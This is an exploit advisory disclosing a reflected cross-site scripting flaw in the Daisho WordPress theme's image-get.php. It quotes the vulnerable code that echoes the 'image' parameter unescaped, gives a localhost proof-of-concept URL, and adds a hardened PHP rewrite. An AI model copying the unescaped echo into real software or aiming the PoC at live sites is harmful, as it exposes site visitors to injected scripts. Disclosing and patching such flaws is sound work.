
WordPress Theme Daisho Cross Site Scripting Vulnerability

Author: Pro_Mast3r , Published: 05-11-2014
#[~] Exploit Type : Cross Site Scripting Vulnerability (reflected)
#[~] Vendor : Daisho theme
#[~] Vendor Site : http://devatic.com/
#[~] Author : ProMast3r
#[~] Mail : Pro.Mast3r@hotmail.com
--------------------------------------------------------
#[~] Vulnerable file : image-get.php
#[~] Source file (excerpt as quoted in the advisory; the branch that opens the if/else below is not part of the excerpt) :
$value = $_GET['image'];
$mimes = get_allowed_mime_types();            // WordPress: array of 'ext|ext' => 'mime/type'
$file_ext = explode('.', $value);
foreach ($mimes as $type => $mime) {
    // substring match of the last dot-separated part of the parameter against the 'ext|ext' key
    if (strpos($type, end($file_ext)) !== false) {
        if (fileExists($value)) {             // not PHP's file_exists(); assumed to be a theme helper
            $contents = file_get_contents($value);
            header('Content-type: ' . $mime);
            echo $contents;
            break;
        }
    }
}
} else {
    // no matching extension / file: the raw parameter is echoed back unescaped,
    // which is the reflected XSS this advisory reports
    echo $_GET['image'];
--------------------------------------------------------
#[~] PoC : http://127.0.0.1/wordpress/wp-content/themes/Daisho/admin/image-get.php?image=XSS
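For comparison, here is a hardened rewrite of the same handler logic. This is an added example written for this page, not the theme's own code or the advisory author's. It assumes WordPress is loaded (so get_allowed_mime_types() is available), and the IMAGE_DIR constant and the helper function names are placeholders I chose. The fix for the reported issue is in the error branch: the parameter is never echoed back as HTML, only as escaped text/plain. The rest (whole-token extension matching, image-only MIME types, a fixed directory, nosniff) is general input-handling hygiene for a file-serving endpoint.

```php
<?php
// Added example (not the Daisho theme's code): hardened version of the
// image-get.php logic quoted above. Assumes WordPress is loaded.
// IMAGE_DIR is a placeholder for wherever the theme keeps its images.
if (!defined('IMAGE_DIR')) {
    define('IMAGE_DIR', __DIR__ . '/images');
}

function daisho_safe_image_get(array $get): void
{
    $value = isset($get['image']) ? (string) $get['image'] : '';

    // Accept only a plain "name.ext" file name: no directory parts, no odd characters.
    if (!preg_match('/^[A-Za-z0-9_-]+\.[A-Za-z0-9]+$/', $value)) {
        daisho_reject($value);
        return;
    }

    $ext  = strtolower(pathinfo($value, PATHINFO_EXTENSION));
    $mime = null;
    foreach (get_allowed_mime_types() as $type => $candidate) {
        // $type looks like 'jpg|jpeg|jpe'; match whole tokens, not substrings as the
        // original strpos() check does, and serve image types only.
        if (in_array($ext, explode('|', $type), true) && strpos($candidate, 'image/') === 0) {
            $mime = $candidate;
            break;
        }
    }
    if ($mime === null) {
        daisho_reject($value);
        return;
    }

    $path = IMAGE_DIR . '/' . $value;
    if (!is_file($path)) {
        daisho_reject($value);
        return;
    }

    header('Content-Type: ' . $mime);
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}

// Error path: the user-controlled value is returned as escaped plain text,
// so a browser never parses it as HTML. This replaces the bare echo $_GET['image'].
function daisho_reject(string $value): void
{
    http_response_code(400);
    header('Content-Type: text/plain; charset=UTF-8');
    header('X-Content-Type-Options: nosniff');
    echo 'Invalid image parameter: ' . htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

daisho_safe_image_get($_GET);
```

With this version the advisory's PoC request (image=XSS) fails the extension check and receives a 400 text/plain response containing the literal, escaped string, which is also what a WAF or access-log rule would see if you wanted to alert on repeated rejects against this endpoint.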

#End
#exploit4arab
#IRAQCyberArmy
